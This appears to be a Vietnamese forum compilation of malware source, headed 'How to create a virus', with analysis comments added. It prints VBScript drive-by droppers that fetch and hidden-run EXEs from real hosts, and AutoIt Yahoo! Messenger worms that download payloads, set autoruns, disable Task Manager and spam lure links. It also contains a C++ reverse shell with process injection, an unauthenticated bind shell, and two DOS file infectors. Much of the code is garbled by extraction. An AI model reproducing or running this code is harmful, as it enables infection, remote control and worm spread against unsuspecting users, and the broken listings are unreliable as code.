The idea is simple: insert trojan code into the source of a commonly used program. Some of the most useful programs to us in this [sentence cut off in extraction]
Cách tạo virus (How to create a virus)
[YM Virus]nhut.be
<script language="VBScript">
' === Malware sample (Yahoo! Messenger worm dropper page, mid-2000s), kept for analysis only ===
' Drive-by download-and-execute: fetches a PE from the URL below, writes it to the user's
' TEMP folder and launches it hidden. It hinges on the ActiveX control with CLSID
' BD96C556-65A3-11D0-983A-00C04FC29E36 (RDS.DataSpace), whose CreateObject was abused to
' instantiate otherwise-unsafe COM objects from a web page (cf. MS06-014). A browser with
' that fix, or with ActiveX disabled, does nothing here. The listing is as extracted from a
' forum page and is not guaranteed complete; it must not be "repaired".
' Detection indicators: the download URL, the dropped file %TEMP%\bl4ck.com, and the
' XMLHTTP -> ADODB.Stream.SaveToFile -> Shell.Application.ShellExecute chain inside IE.
on error resume next                   ' swallow every error so partial failure stays silent
dl = "http://nhut.be/dkc.exe"          ' stage-2 payload URL (IOC)
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"   ' RDS.DataSpace
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")        ' XMLHTTP instantiated through RDS.DataSpace
a1="Ado"                               ' "Adodb.Stream" assembled from four fragments,
a2="db."                               ' presumably to defeat naive string signatures
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")       ' ADODB.Stream
S.type = 1                             ' adTypeBinary
str6="GET"
x.Open str6, dl, False                 ' synchronous GET of the payload
x.Send
fname1="bl4ck.com"                     ' dropped file name (IOC)
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)        ' 2 = TemporaryFolder
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody                 ' raw bytes of the HTTP response
S.savetofile fname1,2                  ' 2 = adSaveCreateOverWrite
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0   ' last argument 0 = SW_HIDE: run the payload with no window
</script>
[YM Virus]viet8x.evonet.ro
<html>
<head>
<title>
:: Welcome ::
</title>
<!-- Malware sample (Yahoo! Messenger worm dropper page, "viet8x"), kept for analysis only.
     The opening <script language="VBScript"> tag was lost in extraction and the first code
     line carries a fused page marker "(2)". The script is otherwise the same drive-by
     download-and-execute routine as the nhut.be sample above: RDS.DataSpace (CLSID
     BD96C556-65A3-11D0-983A-00C04FC29E36, cf. MS06-014) is used to create XMLHTTP,
     ADODB.Stream, Scripting.FileSystemObject and Shell.Application; the payload URL here is
     http://viet8x.evonet.ro/task.exe and the dropped name is again %TEMP%\bl4ck.com,
     executed with SW_HIDE. The decoy body below just shows "You're welcome" so the
     victim sees a harmless page. Not runnable as shown; do not repair. -->
(2)on error resume next
dl = "http://viet8x.evonet.ro/task.exe"
Set df = document.createElement("object")
df.setAttribute "classid",
"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="bl4ck.com"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>
</head>
<body bgcolor="lavender">
<br><br><br>
<center>
<h3>You're welcome</h3>
</center>
(3)[YM Virus]Vuichoivn.com Scripts
<script language="VBScript"> on error resume next
' === Malware sample (Yahoo! Messenger worm dropper, "Vuichoivn"), kept for analysis only ===
' Third copy of the same RDS.DataSpace / ADODB.Stream drive-by downloader. Differences
' from the two samples above: payload URL http://vuichoivn.com/guitangban.exe and the
' dropped name "svchost32.exe" in %TEMP%, chosen to resemble the legitimate svchost.exe.
' Extraction collapsed several statements onto one line without ":" separators and
' dropped the value of "S.type =", so this is not valid VBScript and must not be
' "repaired". Detection indicators: the URL, %TEMP%\svchost32.exe, and a hidden
' ShellExecute launched from the browser process.
dl = "http://vuichoivn.com/guitangban.exe" Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"") a1="Ado"
a2="db." a3="Str" a4="eam"
str1=a1&a2&a3&a4 str5=str1
set S = df.createobject(str5,"") S.type =
str6="GET"
x.Open str6, dl, False x.Send
fname1="svchost32.exe"
set F = df.createobject("Scripting.FileSystemObject","") set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1) S.open
S.write x.responseBody S.savetofile fname1,2 S.close
set Q = df.createobject("Shell.Application","") Q.ShellExecute fname1,"","","open",0
</script>
[YM Virus]VuiVeVn.HP.Ms
; === Malware sample: AutoIt Yahoo! Messenger worm ("VuiVeVn"), kept for analysis only ===
; What the visible code does: downloads a PE into %WINDIR%\taskmng.exe, registers it under
; HKLM\...\Run (value names "BkavFw" and "Task Manager"), disables Task Manager and the
; Registry Editor through HKCU policy values, rewrites the IE start page / window title and
; two Yahoo! Messenger content URLs, then puts a lure line on the clipboard and, when a YM
; window exists, blocks user input and drives the client with synthetic keystrokes so the
; clipboard text is sent to many contacts at once.
; Extraction dropped literals (e.g. the right-hand side of "if $wincheck = then"), so this
; is not a runnable script and should not be completed.
; Detection / IR notes:
;   - Run values pointing at %WINDIR%\taskmng.exe ("BkavFw" presumably apes the Bkav AV
;     product name; judge autoruns by their target path, not their label)
;   - HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System
;     DisableTaskMgr=1 and DisableRegistryTools=1
;   - HKCU\Software\Yahoo\pager\View\YMSGR_buzz|YMSGR_Launchcast "content url" rewritten
;   - outbound HTTP to 72.232.123.170
$website = "http://72.232.123.170/~love/"   ; payload host (IOC)
$website2 = "Http://dasdasdasd"             ; junk URL pushed into IE and YM settings
If Not FileExists(@WindowsDir & "\taskmng.exe") Then
InetGet ($website & "/xlove.exe", @WindowsDir & "\taskmng.exe", 0, 1)   ; fetch the dropper (4th arg 1 = background download)
Sleep(500)
EndIf
; persistence: two HKLM Run values for the same binary (key paths are line-wrapped by extraction)
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi
ndows\CurrentVersion\Run", "BkavFw", "REG_SZ","C:\WINDOWS\taskmng.exe")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi
ndows\CurrentVersion\Run", "Task Manager",
"REG_SZ","C:\WINDOWS\taskmng.exe")
; defence evasion: lock the user out of Task Manager and regedit ("(4)" is a fused page marker)
(4)RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win
dows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win
dows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", "1")
; browser / messenger hijack (key paths contain extraction-inserted spaces, e.g. "Int ernet")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Int ernet Explorer\Main",
"Start Page", "REG_SZ", $website2)
RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\V iew\YMSGR_buzz",
"content url", "REG_SZ", $website2)
RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\V
iew\YMSGR_Launchcast", "content url", "REG_SZ", $website2)
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Wi
ndows\CurrentVersion\Run", "Task Manager", "REG_SZ", @WindowsDir &
"\taskmng.exe")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Int ernet Explorer\Main",
"Window Title", "REG_SZ", "wWw.LoveNovel.Kiss.To")
; propagation: keystroke-driven spam through the victim's Yahoo! Messenger client
$title = WinGetTitle("Yahoo! Messenger")
$wincheck = WinExists ($title)
ClipPut("http://adasd <=== See My Picture :X :X So Cute !!! (No Virus)")   ; social-engineering lure (IOC string)
if $wincheck = then                 ; comparison operand lost in extraction
BlockInput (1)                      ; keep the user from interrupting the automation
WinActivate($title)
send("!A")                          ; Alt+A then M: presumably YM's Actions menu / send-message dialog for that client version - confirm
send("M")
sleep(600)
send("{DOWN}")
send("{SHIFTDOWN}")
send("{DOWN 70}")                   ; Shift held while moving down: presumably extends the contact selection
send("{enter}")
send("{LSHIFT}")
send("^v {ENTER}")                  ; paste the clipboard lure and send
BlockInput (0)
endif
Code virus "gaixinh" (source of the "gaixinh" Yahoo! Messenger worm) — sưu tầm, share cho các bạn (collected and shared with readers)
; <AUT2EXE VERSION: 3.1.1.112>
;
-; < -;AUT2EXE INCLUDE-START: C:\Documents and Settings\Hai
Long\Desktop\Robots.au3>
;
;
-;
; AutoIt Version: 3.1.0
(5);
; Script Function:
; Template AutoIt script.
;
;
-; Script Start - Add your code below here
; === Malware sample: AutoIt Yahoo! Messenger worm ("Robots" / "gaixinh"), for analysis only ===
; Visible behaviour: hides its tray icon, downloads http://xrobots.net/Gift/Robots.exe to
; %WINDIR%\Messenger.exe and registers it as HKLM\...\Run "Yahoo!!!"; pulls Version.txt
; from the same host and, when it differs from $version, fetches and runs Update.exe (a
; crude self-update channel); rewrites the IE start page and two Yahoo! Messenger content
; URLs; sets DisableRegistryTools; deletes msconfig.exe; and on selected iterations of a
; loop whose "For" header the poster removed (the orphaned "Next" at the end is what is
; left) pushes a lure URL onto the clipboard and drives YM with keystrokes to spam it.
; Literals were dropped in extraction ("if $checkfile = then", "if $check = then", ...);
; do not reconstruct.
; Detection / IR notes:
;   - HKLM\Software\Microsoft\Windows\CurrentVersion\Run "Yahoo!!!" -> %WINDIR%\Messenger.exe
;   - %WINDIR%\Version.txt / Update.exe; HTTP to xrobots.net/Gift/ and 67.15.40.2
;   - HKCU\...\Policies\System DisableRegistryTools=1; missing %WINDIR%\pchealth\helpctr\binaries\msconfig.exe
;   - HKCU\Software\Yahoo\pager\View\YMSGR_Launchcast|YMSGR_buzz "content url" rewritten
$version = "1.0"
AutoItSetOption ("TrayIconHide","1")          ; stay invisible in the tray
InetGet ( "Http://xrobots.net/Gift/Robots.exe" ,@WindowsDir & "\Messenger.exe" ,0,1)   ; drop the worm binary
sleep(3000)
; persistence (key path line-wrapped and "@Win dowsDir" split by extraction)
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wi
ndows\CurrentVersion\Run","Yahoo!!!","REG_SZ",@Win dowsDir &
"\Messenger.exe")
; self-update: compare the first 3 bytes of the remote Version.txt with $version
InetGet ( "Http://xrobots.net/Gift/Version.txt" ,@WindowsDir & "\Version.txt" ,1,1)
sleep(5000)
$checkfile = FileExists ( @WindowsDir & "\Version.txt" )
if $checkfile = then                           ; operand lost in extraction
$file = FileOpen (@WindowsDir & "\Version.txt",0 )
$read = FileRead($file,3)
FileClose($file)
if $read <> $version then
InetGet ( "Http://xrobots.net/Gift/Update.exe" ,@WindowsDir & "\Update.exe" ,1,1)
sleep (3000)
Run(@WindowsDir & "\Update.exe")               ; runs whatever the update host serves
endif
endif
; browser / messenger hijack
RegWrite("HKEY_CURRENT_USER\SOFTWARE\microsoft\Int ernet Explorer\Main",
"Start Page", "REG_SZ", "http://67.15.40.2/~tranphu/forumtp/")
RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\V
iew\YMSGR_Launchcast","content url","REG_SZ", "http://xRobots.net/Gift/New/")
RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\V
iew\YMSGR_buzz","content url","REG_SZ", "http://vietnamnet.vn")
; defence evasion: no regedit, no msconfig
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Win
dows\CurrentVersion\Policies\System", "DisableRegistryTools","REG_DWORD","1")
AutoItSetOption ("WinTitleMatchMode", "2")     ; substring window-title matching for the YM lookup below
$check = FileExists ( @WindowsDir & "\pchealth\helpctr\binaries\msconfig.exe" )
if $check = then
(6)FileDelete (@WindowsDir & "\pchealth\helpctr\binaries\msconfig.exe")   ; "(6)" is a fused page marker
endif
;; Segment deleted so the code cannot be abused (poster's note; the loop header defining $count went with it)
;; xLuke
; propagation: on selected iterations, spam the lure through the YM client
if ($count = 2) or ($count = 6) or ($count = 9) or ($count = 12) or ($count = 15) or
($count = 18) or ($count = 21) or ($count = 24) or ($count = 27) or ($count = 30) then
$title = WinGetTitle("Yahoo! Messenger")
$wincheck = WinExists ($title)
; the <a ...> markup inside ClipPut is the forum's auto-link rendering of the URL, not worm code
ClipPut("Gai xinh ne , gai xinh ne : <a href="http://xrobots.net/Gift/?file=Gaixinh.jpg"
target="_blank" rel="nofollow" class="limitview">http://xrobots.net/Gift/?
file=Gaixinh.jpg</a>")
if $wincheck = then
BlockInput (1)
WinActivate($title)
send("!A")
send("M")
sleep(400)
send("{DOWN}")
send("{SHIFTDOWN}")
send("{DOWN 70}")
send("{enter}")
send("{LSHIFT}")
send("^v {ENTER}")
BlockInput (0)
endif
endif
Next
;
-; < -;AUT2EXE INCLUDE-END: C:\Documents and Settings\Hai
Long\Desktop\Robots.au3>
;
-
coding ~ ntshell, a tiny Win32 reverse shell
ntshell.cpp:
//Reverse NT Shell 1.1 by D-oNe
(7)//
//Start NC: nc.exe -l -p 666, Then Run ntshell.exe! //Optmization Code
#pragma optimize("gsy",on)
#pragma comment(linker,"/RELEASE")
#pragma comment(linker,"/ENTRY:EntryPoint") #pragma comment(linker,"/MERGE:.rdata=.data") #pragma comment(linker,"/MERGE:.text=.data") #pragma comment(linker,"/MERGE:.reloc=.data")
#pragma comment(linker,"/SECTION:.text,EWR /IGNORE:4078") #pragma comment(linker,"/FILEALIGN:0x200")
#pragma comment(linker,"/subsystem:windows") #pragma comment(linker,"/base:0x7D000000") //Libs
#pragma comment(lib, "kernel32") #pragma comment(lib, "user32") #pragma comment(lib, "ws2_32") //Includes
#define WIN32_LEAN_AND_MEAN #include <windows.h>
#include <tlhelp32.h> #include <winsock2.h> //Settings
char *szIP = "127.0.0.1";      // reverse-shell callback address (loopback in this sample)
int port = 666;                // callback port; matches the "nc -l -p 666" in the header comment
// name of the process the injector looks up; the shell thread is created inside it
char *injproc = "notepad.exe"; //Shell Code
// Reverse-shell thread body. Runs inside the process chosen by injectcode()/EntryPoint():
// connects to szIP:port, then spawns cmd.exe hidden with its standard handles bound to
// that socket (the "nc -l -p 666" side of the header comment gets an interactive shell).
// Malware sample kept for analysis; the text is garbled by extraction (statements were
// collapsed onto shared lines, a page marker "(8)" is fused into the hStdError line, and
// the hStdInput/hStdOutput assignments implied by STARTF_USESTDHANDLES are not visible).
// Detection: cmd.exe created by a process such as notepad.exe with bInheritHandles=TRUE,
// SW_HIDE and std handles that are a socket, plus an outbound TCP connection from that process.
// Return values of WSAStartup/WSASocket/connect/CreateProcess are all ignored.
DWORD WINAPI shell(LPVOID param) {
WSADATA WSAData;
struct sockaddr_in sin; SOCKET sock;
STARTUPINFO si;
PROCESS_INFORMATION pi;
LoadLibrary("kernel32.dll"); LoadLibrary("user32.dll"); LoadLibrary("ws2_32.dll"); memset(&sin, 0, sizeof(sin)); // presumably to ensure these DLLs are mapped in the host process, since the image is copied in raw
WSAStartup(MAKEWORD(1, 1), &WSAData); sin.sin_family = AF_INET;
sin.sin_port = htons(port);                 // callback port (file-level setting)
sin.sin_addr.s_addr = inet_addr(szIP);      // callback address (file-level setting)
sock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0,
0);
connect(sock, (struct sockaddr*)&sin, sizeof(sin)); memset(&si, 0, sizeof(si)); // connect() result unchecked: cmd.exe is spawned regardless
memset(&pi, 0, sizeof(pi)); si.cb = sizeof(STARTUPINFO);
si.dwFlags = STARTF_USESHOWWINDOW + STARTF_USESTDHANDLES; si.wShowWindow = SW_HIDE;
(8)si.hStdError = (HANDLE)sock;              // "(8)" is a fused page marker; stderr -> socket
CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, 0, 0, NULL, &si, &pi); // bInheritHandles=TRUE so the socket handle reaches cmd.exe
return 0; }
//Inject Code
// Copies this program's own in-memory image into hProcess and starts lpCodeToInject there
// on a new thread: VirtualFreeEx -> VirtualAllocEx (RWX, at our own image base) ->
// WriteProcessMemory -> CreateRemoteThread. The image is copied raw; the linker pragmas
// above (/base:0x7D000000, sections merged into one writable .data) presumably exist so
// the copy works unmodified at the same address in the target. Sample kept for analysis;
// extraction broke identifiers ("lpCodeToInj ect", "MEM_COM MIT"), so it does not compile.
// Detection: this exact API sequence from one process into another, with a
// PAGE_EXECUTE_READWRITE allocation at a high fixed base that is not a loaded module.
// hProcess is used without a NULL check and is closed here on the success path.
bool injectcode(HANDLE hProcess, LPTHREAD_START_ROUTINE lpCodeToInj ect)
{
DWORD dwThread, dwSize, dwWritten; PBYTE pbModule;
LPVOID lpBuffer; HANDLE hThread;
pbModule = (PBYTE)GetModuleHandle(0); dwSize = ((PIMAGE_NT_HEADERS)(pbModule+ ((PIMAGE_DOS_HEADER)pbModule)->e_lfanew ))->OptionalHeader.SizeOfImage; // own base address and SizeOfImage from the PE headers
VirtualFreeEx(hProcess, pbModule, 0, MEM_RELEASE);   // try to vacate our base address in the target
lpBuffer = VirtualAllocEx(hProcess, pbModule, dwSize, MEM_COM MIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (!lpBuffer) return FALSE;
if (!WriteProcessMemory(hProcess, lpBuffer, pbModule, dwSize, &dwWritten)) return FALSE;
hThread = CreateRemoteThread(hProcess, 0, 0, lpCodeToInject,
pbModule, 0, &dwThread);                      // thread start = shell() at the address it has in this process
if (!hThread) return FALSE; CloseHandle(hThread); CloseHandle(hProcess); return TRUE;
}
// Returns the PID of the first process whose image name matches szExe (case-insensitive,
// via a Toolhelp snapshot), or 0 when the snapshot cannot be walked. The extracted text
// apparently lost the "do" that opened the loop body on the "} {" line, the flags argument
// of CreateToolhelp32Snapshot, and the function's closing "return 0; }", so the listing
// below is not syntactically complete - annotate, do not repair.
// The snapshot handle is leaked on the match path (return before CloseHandle).
DWORD GetPID(char *szExe) {
HANDLE hProcessSnap; PROCESSENTRY32 pe32;
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,
);
pe32.dwSize = sizeof(PROCESSENTRY32); if (!Process32First(hProcessSnap, &pe32)) {
CloseHandle(hProcessSnap); return 0;
} {
if (lstrcmpi(pe32.szExeFile, szExe) == 0) {
return (pe32.th32ProcessID); break;
} }
while (Process32Next(hProcessSnap, &pe32)); CloseHandle(hProcessSnap);
// Program entry (the linker pragma /ENTRY:EntryPoint bypasses the CRT). Opens the process
// named by injproc with PROCESS_ALL_ACCESS, injects shell() into it and exits, so the
// reverse shell lives on inside that process after this dropper is gone. "(9)" is a fused
// page marker and "injp roc" an extraction split. If GetPID finds nothing, OpenProcess is
// called with PID 0 and injectcode receives whatever it returns, unchecked.
// Sample kept for analysis only.
(9)void EntryPoint() {
HANDLE hProcess;
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, GetPID(injp roc));
injectcode(hProcess, shell); ExitProcess(0);
}
R@n's items
tiếp theo (next):
mShell.cpp
//mShell 0.2 by D-oNe,
aka_done@hotmail.com
//
//Optimization Code
#pragma optimize("gsy",on)
#pragma comment(linker,"/RELEASE")
#pragma comment(linker,"/ENTRY:shell")
#pragma comment(linker,"/MERGE:.rdata=.data")
#pragma comment(linker,"/MERGE:.text=.data")
#pragma comment(linker,"/MERGE:.reloc=.data")
#pragma comment(linker,"/SECTION:.text,EWR /IGNORE:4078")
#pragma comment(linker,"/FILEALIGN:0x200")
#pragma comment(linker,"/subsystem:windows")
//Includes
#include <windows.h>
#include <winsock.h>
//Port To Listen On
const int port = 23;   // bind-shell listen port: 23/tcp (telnet); no authentication of any kind - see shell()
//Shell Handler
// Per-client thread of the bind shell: starts %ComSpec% hidden with stdin/stdout/stderr on
// two anonymous pipes, then relays pipe output to the socket and socket input to the pipe
// until the client sends a buffer containing "_exit". Malware sample kept for analysis.
// The listing is incomplete: szCmdPath, szBuffer and lpNumberOfBytesRead are used but
// their declarations (globals, presumably) are not in the extracted text, "(10)"/"(11)"
// are fused page markers, and the closing brace of the "_exit" if-block before the "else"
// is missing. Do not repair.
// Detection: cmd.exe/command.com spawned with SW_HIDE and inherited pipe handles by a
// process that also owns a listening socket; a PeekNamedPipe/ReadFile/send polling loop.
DWORD WINAPI shell_handler(void *sendsock_)
{
(10)HANDLE hPipeRead1, hPipeWrite1, hPipeRead2, hPipeWrite2;
int count = 0, i;
PROCESS_INFORMATION pInfo;
SECURITY_ATTRIBUTES secu =
{
(DWORD)sizeof(SECURITY_ATTRIBUTES), NULL, TRUE     // bInheritHandle = TRUE: the pipe ends must reach the child
};
SOCKET sendsock = (SOCKET)sendsock_;
STARTUPINFO sInfo;
if (sendsock == INVALID_SOCKET) return 0;
CreatePipe(&hPipeRead1, &hPipeWrite1, &secu, 0);   // pipe 1: child stdout/stderr -> us
CreatePipe(&hPipeRead2, &hPipeWrite2, &secu, 0);   // pipe 2: us -> child stdin
GetEnvironmentVariable("ComSpec", szCmdPath, sizeof(szCmdPath));   // %ComSpec% = cmd.exe / command.com
memset(&sInfo, 0, sizeof(sInfo));
memset(&pInfo, 0, sizeof(pInfo));
sInfo.cb = sizeof (STARTUPINFO);
sInfo.dwFlags = STARTF_USESHOWWINDOW + STARTF_USESTDHANDLES;
sInfo.wShowWindow = SW_HIDE;
sInfo.hStdInput = hPipeRead2;
sInfo.hStdOutput = hPipeWrite1;
sInfo.hStdError = hPipeWrite1;
CreateProcess(NULL, szCmdPath, &secu, &secu, TRUE, 0, NULL, NULL, &sInfo,
&pInfo);                                           // result unchecked
while (sendsock != SOCKET_ERROR)                   // compares the handle value, not a status: effectively loops until a break below
{
memset(szBuffer, 0, sizeof(szBuffer));
PeekNamedPipe(hPipeRead1, NULL, NULL, NULL, &lpNumberOfBytesRead, NULL);
while (lpNumberOfBytesRead)                        // drain everything the shell has written so far
{
if (!ReadFile(hPipeRead1, szBuffer, sizeof(szBuffer), &lpNumberOfBytesRead, NULL))
break;
else send(sendsock, szBuffer, lpNumberOfBytesRead, 0);
PeekNamedPipe(hPipeRead1, NULL, NULL, NULL, &lpNumberOfBytesRead, NULL);
}
i = recv(sendsock, szBuffer, sizeof(szBuffer) ,0);   // blocking read of the client's next command; i = length or error
if (sendsock == 0)                                   // tests the socket handle rather than i, so this disconnect check is presumably dead
{
count++;
if (count > 1) break;
}
if (!strstr(szBuffer, "_exit") == 0)                 // precedence: (!strstr(...)) == 0, i.e. true when "_exit" IS present
{
TerminateProcess(pInfo.hProcess, 0);
return 0;
(11)else WriteFile(hPipeWrite2, szBuffer, i, &lpNumberOfBytesRead, 0);   // forward the command to the shell's stdin; closing brace lost in extraction
Sleep(10);
}
TerminateProcess(pInfo.hProcess, 0);
return 0;
}
//Shell Listener
// Bind-shell listener and process entry (linker pragma /ENTRY:shell, no CRT). Binds
// 0.0.0.0:port (23/tcp), accepts forever and hands each client to shell_handler on its own
// thread, i.e. anyone who can reach the port gets an unauthenticated command shell.
// Everything after the while(1) is unreachable. Sample kept for analysis only.
// Detection: an unexpected listener on 23/tcp whose owning process is not a telnet daemon,
// and hidden cmd.exe children of that process with inherited pipe handles.
void shell()
{
DWORD dwID;
register int size;
SOCKET shellsock, sendsock;
struct sockaddr_in sin;
WSADATA wsadata;
if (WSAStartup(MAKEWORD(2,2), &wsadata) != 0) ExitProcess(0);
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = 0;          // INADDR_ANY: listen on every interface
sin.sin_port = htons(port);
size = sizeof(sin);
shellsock = socket (AF_INET, SOCK_STREAM, 0);
bind(shellsock, (struct sockaddr *)&sin, sizeof(sin));   // bind/listen results unchecked
listen(shellsock, 0);
while (1)
{
sendsock = accept(shellsock,(struct sockaddr *)&sin, &size);
if (sendsock != INVALID_SOCKET) CreateThread(0, 0, shell_handler, (void *)sendsock,
0, &dwID);                      // one handler thread per client; the socket is the thread argument
Sleep(100);
}
closesocket(sendsock);              // never reached
closesocket(shellsock);
WSACleanup();
return;
}
; The EXEcution III Virus.
;
; Well, you're now the prouw owner of the smallest virus ever made!
; only 23 bytes long and ofcourse again very lame
; But what the heck, it's just an educational piece of code!!
;
(12); Tnx to myself, my assembler, DOS (yuck) and to John Tardy for his
; nice try to make the smallest (27 bytes and 25 bytes) virus
gotcha!! ;-))
;
; BTW Don't forget, I only tested it unter DOS 5.0 so on other
versions
; it might not work!
; --- Analysis notes (reviewer) ---
; "EXEcution III": a ~23-byte OVERWRITING infector. Every INT 21h call goes through the
; DO_IT stub: AH=4Eh FindFirst on "*.*" (the filename string at START doubles as the first
; instruction, per the author's comment), AX=3D01h open-for-write on the DTA name at
; DS:9Eh, AH=40h write from DS:100h (MOV DX,SI leans on SI being 100h at .COM entry) over
; the start of the file, then JMP DO_IT again with whatever AH/CX the previous call left.
; Hosts are not preserved: files it opens get their first bytes replaced, and it breaks on
; other DOS versions, as the author admits. Kept only as the canonical "smallest virus"
; example of register abuse; it has no stealth and every touched file visibly changes.
_CODE SEGMENT
ASSUME CS:_CODE
ORG 100h
START: ; That's where we're starting
FILE DB '*.*',0h ; Dummy instruction, SUB's 0FFh from CH
MOV AH,4Eh ; Let's search!
DO_IT: MOV DX,SI ; Make DX = 100h (offset file)
INT 21h ; Search now dude!
MOV AX,3D01h ; Hmm, infect that fucking file!
MOV DX,9Eh ; Name is at DS:[9Eh]
INT 21h ; Go it!
XCHG BX,AX ; Put the handle in BX
MOV AH,40h ; Write myself!
JMP DO_IT ; Use other routine
_CODE ENDS
END START
Virus FirstStar Source Code
;
********************************************************
********************;
; ;
(13); -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION ***
;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be
Passed ;
; Around Among the General Public It Will be Very Useful for
Learning how ;
; Viruses Work and Propagate But Anybody With Access to an
Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly
Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it
Already ;
; Is Keep This Code in Responsible Hands! ;
; ;
;
********************************************************
********************;
;
; First-Star / 222 Virus
;
; (C) by Glenn Benton in 1992
; This is a non-resident direct action COM infector in current
dirs.
;
;
;
; --- Analysis notes (reviewer) ---
; "First-Star / 222": non-resident, direct-action appender for *.COM in the current
; directory. Flow: put the host's saved first bytes (OrgPrg) back in memory -> private DTA
; at 0FD00h -> FindFirst "*.COM" -> per hit: read and stash attributes and timestamp,
; clear attributes, open read/write, read the head, skip EXE images ("MZ"/"ZM") and files
; already carrying the '*' marker at offset 3 -> otherwise append VirLen bytes from
; MainVir at EOF and overwrite the first 4 bytes with E9 <disp> '*' -> restore timestamp
; and attributes (so directory listings look untouched) -> one infection per run -> restore
; the DTA and leave. Fused page markers "(15)"/"(16)" and some register setup that is not
; visible (CX/DX before the AH=3Fh read) mean this is an annotated sample, not source.
; For file-infector research: .COM files that grew by VirLen bytes, begin with E9 and have
; '*' at offset 3, with timestamps unchanged despite changed content.
Start: Jmp MainVir              ; 3-byte jump the infector writes over the host's first bytes (CallPtr)
Db '*'                          ; infection marker at offset 3; checked before infecting
MainVir: Call On1
On1: Pop BP                     ; delta offset: BP = actual address - assembled address
Sub BP,Offset MainVir+3
Push Ax
Mov Ax,Cs:OrgPrg[BP]            ; saved original first 4 bytes of the host...
Mov Bx,Cs:OrgPrg[BP]+2
Mov Cs:Start+100h,Ax            ; ...written back in memory (target address as written; verify)
Mov Cs:Start[2]+100h,Bx
Mov Ah,1ah                      ; Set DTA to 0FD00h (private area, keeps the PSP DTA untouched)
Mov Dx,0fd00h
Int 21h
Mov Ah,4eh                      ; Find First matching FileSpec
Search: Lea Dx,FileSpec[BP]
Xor Cx,Cx
Int 21h
Jnc Found
Jmp Ready                       ; nothing (more) to infect
Found: Mov Ax,4300h             ; Get attributes of the DTA file name at 0FD1Eh...
Mov Dx,0fd1eh
Int 21h
Push Cx                         ; ...saved for Close
Mov Ax,4301h                    ; clear attributes so read-only/hidden files can be opened
Xor Cx,Cx
Int 21h
Mov Ax,3d02h                    ; open read/write
Int 21h
Mov Bx,5700h                    ; Get date/time (handle goes to BX via XCHG)
Xchg Ax,Bx
Int 21h
Push Cx                         ; timestamp saved for Close
Push Dx
Mov Ah,3fh                      ; read the head of the file (buffer/count setup not visible here)
(15)Int 21h
Mov Ax,Cs:[OrgPrg][BP]
Cmp Ax,'MZ'                     ; skip EXE images renamed .COM
Je ExeFile
Cmp Ax,'ZM'
Je ExeFile
Mov Ah,Cs:[OrgPrg+3][BP]
Cmp Ah,'*'                      ; already infected?
Jne Infect
ExeFile: Call Close             ; not a target: close/restore, then Find Next
Mov Ah,4fh
Jmp Search
FSeek: Xor Cx,Cx                ; helper: seek with CX:DX = 0, AX preset by caller
Xor Dx,Dx
Int 21h
Ret
Infect: Mov Ax,4202h            ; seek to EOF; AX = file size
Call FSeek
Sub Ax,3                        ; jump displacement = size - 3
Mov Cs:CallPtr[BP]+1,Ax
Mov Ah,40h                      ; append the body
Lea Dx,MainVir[BP]
Mov Cx,VirLen
Int 21h
Mov Ax,4200h                    ; seek to start
Call FSeek
Mov Ah,40h                      ; write E9 <disp> '*' over the first 4 bytes
Lea Dx,CallPtr[BP]
Mov Cx,4
Int 21h
Call Close
Ready: Mov Ah,1ah               ; restore the default DTA at 80h
